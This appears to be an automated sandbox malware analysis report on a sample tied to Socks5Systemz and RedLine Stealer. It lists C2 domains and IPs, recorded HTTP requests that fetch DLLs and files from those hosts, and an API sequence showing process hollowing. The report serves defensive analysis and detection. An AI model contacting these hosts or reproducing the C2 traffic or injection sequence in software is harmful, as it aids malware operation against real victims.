            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50050 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50054 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50058 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50058 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50060 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50060 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50061 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50061 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50053 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50053 -> 185.208.158.202:80
            Source: Malware configuration extractorURLs: boietuj.com
            Source: Malware configuration extractorIPs: 185.156.72.65
            Source: global trafficTCP traffic: 192.168.2.4:49864 -> 89.105.201.183:2023
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 20 Nov 2024 04:02:18 GMTServer: Apache/2.4.52 (Ubuntu)Content-Disposition: attachment; filename="ONE.file";Content-Length: 4065622Keep-Alive: timeout=5, max=97Connection: Keep-AliveContent-Type: application/octet-stream
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 20 Nov 2024 04:02:25 GMTServer: Apache/2.4.52 (Ubuntu)Content-Disposition: attachment; filename="PAB1.file";Content-Length: 4608Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-stream
            Source: Joe Sandbox ViewIP Address: 185.208.158.202 185.208.158.202
            Source: Joe Sandbox ViewIP Address: 89.105.201.183 89.105.201.183
            Source: Joe Sandbox ViewASN Name: ITDELUXE-ASRU ITDELUXE-ASRU
            Source: Joe Sandbox ViewASN Name: SIMPLECARRER2IT SIMPLECARRER2IT
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31df92d8838ed12a666d307eca743ec4c2b07b529669238658ef814c4ef90 HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe Code function: 6_2_02E472AB Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,InternetOpenA,InternetSetOptionA,InternetSetOptionA,InternetSetOptionA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_strtok,_swscanf,_strtok,_free,Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,_sprintf,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_free, 6_2_02E472AB
            Source: global traffic HTTP traffic detected: GET /add?substr=mixeleven&s=three&sub=nosub HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 User-Agent: 1 Host: 185.156.72.65 Connection: Keep-Alive Cache-Control: no-cache
            Source: global traffic HTTP traffic detected: GET /dll/key HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 User-Agent: 1 Host: 185.156.72.65 Connection: Keep-Alive Cache-Control: no-cache
            Source: global traffic HTTP traffic detected: GET /dll/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 User-Agent: 1 Host: 185.156.72.65 Connection: Keep-Alive Cache-Control: no-cache
            Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 User-Agent: C Host: 185.156.72.65 Connection: Keep-Alive Cache-Control: no-cache
            Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31df92d8838ed12a666d307eca743ec4c2b07b529669238658ef814c4ef90 HTTP/1.1 Host: boietuj.com User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31df92d8838ed12a666d307eca743ec4c2b07b529669238658ef814c4ef90 HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global traffic DNS traffic detected: DNS query: boietuj.com
            Source: altergame32.exe, 00000006.00000002.3049178628.0000000003756000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.208.158.202/s
            Source: altergame32.exe, 00000006.00000002.3047839093.0000000000A61000.00000004.00000020.00020000.00000000.sdmp, altergame32.exe, 00000006.00000002.3049094019.00000000036D2000.00000004.00000020.00020000.00000000.sdmp, altergame32.exe, 00000006.00000002.3047839093.0000000000A82000.00000004.00000020.00020000.00000000.sdmp, altergame32.exe, 00000006.00000002.3047839093.00000000009AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.208.158.202/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958
            Source: altergame32.exe, 00000006.00000002.3047839093.0000000000A82000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.208.158.202/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82d
            Source: altergame32.exe, 00000006.00000002.3049178628.0000000003756000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.208.158.202/search/?q~w
            Source: altergame32.exe, 00000006.00000000.1928604067.000000000052B000.00000002.00000001.01000000.0000000A.sdmp, altergame32.exe.3.dr, EShineEncoder.exe.6.dr, is-85EG4.tmp.3.dr String found in binary or memory: http://freecommander.com/chm/FreeCommanderXE_chm_de.zip
            Source: altergame32.exe, 00000006.00000000.1928604067.000000000052B000.00000002.00000001.01000000.0000000A.sdmp, altergame32.exe.3.dr, EShineEncoder.exe.6.dr, is-85EG4.tmp.3.dr String found in binary or memory: http://freecommander.com/chm/FreeCommanderXE_chm_en.zip
            Source: altergame32.exe, 00000006.00000000.1928604067.000000000052B000.00000002.00000001.01000000.0000000A.sdmp, altergame32.exe.3.dr, EShineEncoder.exe.6.dr, is-85EG4.tmp.3.dr String found in binary or memory: http://freecommander.com/en/downloads/
            Source: altergame32.exe, 00000006.00000000.1928604067.000000000052B000.00000002.00000001.01000000.0000000A.sdmp, altergame32.exe.3.dr, EShineEncoder.exe.6.dr, is-85EG4.tmp.3.dr String found in binary or memory: http://www.forum.freecommander.com/viewtopic.php?f=6&t=775
            Source: altergame32.exe, 00000006.00000000.1928604067.000000000052B000.00000002.00000001.01000000.0000000A.sdmp, altergame32.exe.3.dr, EShineEncoder.exe.6.dr, is-85EG4.tmp.3.dr String found in binary or memory: http://www.freecommander.com/fchelpxe/de/FreeCommander.html
            Source: altergame32.exe, 00000006.00000000.1928604067.000000000052B000.00000002.00000001.01000000.0000000A.sdmp, altergame32.exe.3.dr, EShineEncoder.exe.6.dr, is-85EG4.tmp.3.dr String found in binary or memory: http://www.freecommander.com/fchelpxe/en/FreeCommander.html
            Source: NqISs1vOr.tmp, NqISs1vOr.tmp, 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, is-CUGJK.tmp.3.dr, NqISs1vOr.tmp.2.dr String found in binary or memory: http://www.innosetup.com/
            Source: NqISs1vOr.exe, 00000002.00000003.1902294048.0000000002188000.00000004.00001000.00020000.00000000.sdmp, NqISs1vOr.exe, 00000002.00000003.1902059776.00000000023B0000.00000004.00001000.00020000.00000000.sdmp, NqISs1vOr.tmp, NqISs1vOr.tmp, 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, is-CUGJK.tmp.3.dr, NqISs1vOr.tmp.2.dr String found in binary or memory: http://www.remobjects.com/ps
            Source: NqISs1vOr.exe, 00000002.00000003.1902294048.0000000002188000.00000004.00001000.00020000.00000000.sdmp, NqISs1vOr.exe, 00000002.00000003.1902059776.00000000023B0000.00000004.00001000.00020000.00000000.sdmp, NqISs1vOr.tmp, 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, is-CUGJK.tmp.3.dr, NqISs1vOr.tmp.2.dr String found in binary or memory: http://www.remobjects.com/psU
            Source: altergame32.exe, 00000006.00000000.1928604067.00000000004CB000.00000002.00000001.01000000.0000000A.sdmp, altergame32.exe.3.dr, EShineEncoder.exe.6.dr, is-85EG4.tmp.3.dr String found in binary or memory: https://code.google.com/p/ddab-lib/issues/list
            Source: NqISs1vOr.exe, 00000002.00000003.1901672648.00000000023B0000.00000004.00001000.00020000.00000000.sdmp, NqISs1vOr.exe, 00000002.00000003.1901741426.0000000002181000.00000004.00001000.00020000.00000000.sdmp, NqISs1vOr.exe, 00000002.00000002.3047882008.0000000002181000.00000004.00001000.00020000.00000000.sdmp, NqISs1vOr.tmp, 00000003.00000003.1904023339.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, NqISs1vOr.tmp, 00000003.00000002.3047892256.00000000005BE000.00000004.00000020.00020000.00000000.sdmp, NqISs1vOr.tmp, 00000003.00000003.1904097648.0000000002228000.00000004.00001000.00020000.00000000.sdmp, NqISs1vOr.tmp, 00000003.00000002.3048327976.0000000002228000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.easycutstudio.com/support.html
            Source: is-28G11.tmp.3.dr Binary or memory string: DirectDrawCreateEx memstr_62e4b824-d

            E-Banking Fraud

            Source: Yara match File source: 0.2.file.exe.6315a0.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 00000000.00000002.1816901578.0000000000630000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 00000000.00000002.1816811085.0000000000560000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
            Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00630110 VirtualAlloc,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess, 0_2_00630110
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp Code function: 3_2_0042F518 NtdllDefWindowProc_A, 3_2_0042F518
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp Code function: 3_2_00423B7C NtdllDefWindowProc_A, 3_2_00423B7C
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp Code function: 3_2_00478554 NtdllDefWindowProc_A, 3_2_00478554
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp Code function: 3_2_004125D0 NtdllDefWindowProc_A, 3_2_004125D0
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp Code function: 3_2_004573B4 PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A, 3_2_004573B4
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp Code function: 3_2_0042E92C: CreateFileA,DeviceIoControl,GetLastError,CloseHandle,SetLastError, 3_2_0042E92C
            Source: C:\Users\user\AppData\Roaming\0L1IPDf6p\NqISs1vOr.exe Code function: 2_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx, 2_2_00409448
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp Code function: 3_2_004555B8 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx, 3_2_004555B8
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6093B3686_2_6093B368
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6096748C6_2_6096748C
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6093F42E6_2_6093F42E
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_609544706_2_60954470
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_609615FA6_2_609615FA
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6096A5EE6_2_6096A5EE
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6096D6A46_2_6096D6A4
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_609606A86_2_609606A8
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_609326546_2_60932654
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_609556656_2_60955665
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6094B7DB6_2_6094B7DB
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6092F74D6_2_6092F74D
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_609648076_2_60964807
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6094E9BC6_2_6094E9BC
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_609379296_2_60937929
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6093FAD66_2_6093FAD6
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6096DAE86_2_6096DAE8
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6094DA3A6_2_6094DA3A
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_60936B276_2_60936B27
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_60954CF66_2_60954CF6
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_60950C6B6_2_60950C6B
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_60966DF16_2_60966DF1
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_60963D356_2_60963D35
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_60909E9C6_2_60909E9C
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_60951E866_2_60951E86
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_60912E0B6_2_60912E0B
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_60954FF86_2_60954FF8
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_02E5E24D6_2_02E5E24D
